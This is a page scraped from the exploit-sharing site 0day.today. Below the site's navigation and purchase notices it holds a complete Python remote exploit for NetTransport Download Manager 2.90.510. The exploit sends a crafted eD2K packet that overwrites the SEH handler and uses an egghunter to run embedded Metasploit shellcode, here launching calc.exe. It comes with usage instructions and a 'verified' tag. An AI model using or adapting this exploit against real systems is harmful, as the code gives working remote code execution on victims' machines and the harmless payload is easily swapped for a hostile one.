0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NetTransport Download Manager version:2.90.510 0day
=================================================== NetTransport Download Manager version:2.90.510 0day =================================================== # Title: NetTransport Download Manager version:2.90.510 0day # CVE-ID: () # OSVDB-ID: () # Author: Lincoln # Verified: yes view source print? #!/usr/bin/python ######################### #NetTransport Download Manager version:2.90.510 0day #Discovered by Lincoln #Tested on Windows XP SP3 # #eMule file sharing protocol #SEH overwrite, leaves only 60 or so bytes after p/p/r #egghunter is used to find sc (calc.exe) # #root@BT4VM:~# ./netxfer.py 192.168.1.8 31491 ######################### import socket,sys host = sys.argv[1] port = int(sys.argv[2]) #eD2K port # * windows/exec - 200 bytes # * http://www.metasploit.com # * EXITFUNC=thread, CMD=calc.exe sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63" "\x2e\x65\x78\x65\x00") #magic packet buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24" "\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00" "\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00") #egg = c00lc00l egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") #p/p/r 10002a57 libssl.dll buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buf) print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n" s.close() # 0day.today [2024-07-07] #